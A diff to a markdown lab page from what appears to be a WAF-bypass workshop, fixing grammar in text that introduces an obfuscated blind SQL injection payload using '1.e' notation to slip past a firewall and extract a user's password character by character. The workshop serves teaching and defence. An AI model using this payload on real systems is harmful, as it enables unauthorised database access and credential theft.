h3xstream/waf-workshop/website/docs/03-lab.md

 === ":octicons-check-circle-fill-16: Obfuscated query"

-    With the `1.e` notation expression that are ignored by the DBMS.
+    With the `1.e` notation expression that is ignored by the DBMS.

     ```sql
     or 1.e(ascii 1.e(substring(1.e(select password from users limit 1 1.e,1 1.e) 1.e,1 1.e,1 1.e)1.e)1.e) = 70 or'1'='2